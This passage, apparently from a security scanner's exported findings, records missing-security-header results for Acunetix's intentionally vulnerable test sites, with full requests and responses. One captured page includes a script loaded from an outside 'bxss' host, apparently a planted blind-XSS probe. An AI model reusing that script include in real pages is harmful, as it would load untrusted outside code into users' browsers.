href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 571, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:25.849Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 572, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:26.013Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 573, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:26.194Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": 